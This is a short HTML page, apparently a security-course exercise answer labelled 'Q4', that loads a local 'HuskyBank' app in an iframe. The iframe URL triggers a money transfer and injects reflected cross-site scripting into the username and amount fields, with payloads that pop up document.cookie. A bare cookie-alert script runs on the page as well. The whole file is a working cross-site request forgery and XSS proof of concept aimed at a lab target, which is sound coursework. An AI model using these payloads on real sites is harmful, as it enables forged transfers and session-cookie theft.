<!DOCTYPE html>
<html>
<head>
    <title>Q4</title>
</head>
<body>

<h1 id="helloText">Hello</h1>
<iframe src="http://127.0.0.1:2223/Q4?username=295%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&moneyAmount=295%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&transfer=Transfer+Money" width="800" height="600" title="HuskyBank"></iframe>
<script>alert(document.cookie)</script>

</body>
</html>

